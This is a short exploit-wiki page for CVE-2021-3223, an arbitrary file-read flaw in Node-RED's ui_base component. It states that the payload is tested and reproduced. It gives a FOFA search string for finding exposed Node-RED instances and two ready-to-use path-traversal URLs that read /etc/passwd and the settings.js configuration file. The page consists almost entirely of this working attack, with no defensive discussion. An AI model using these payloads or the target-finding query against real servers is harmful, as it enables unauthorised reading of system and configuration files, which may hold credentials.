CVE-2021-3223 Node-RED ui base arbitrary file reading vulnerability

From PwnWiki
Revision as of 17:24, 4 July 2021 by Pwnwiki (talk | contribs) (Created page with "The EXP/POC/Payload on this page has been tested and available, and the vulnerability has been successfully reproduced.")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎English • ‎中文(中国大陆)‎


Check.png The vulnerability has been verified

The EXP/POC/Payload on this page has been tested and available, and the vulnerability has been successfully reproduced.

Vulnerability Impact

Node-RED

FOFA

title="Node-RED"

POC

/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/ui_base/js/..%2f..%2f..%2f..%2fsettings.js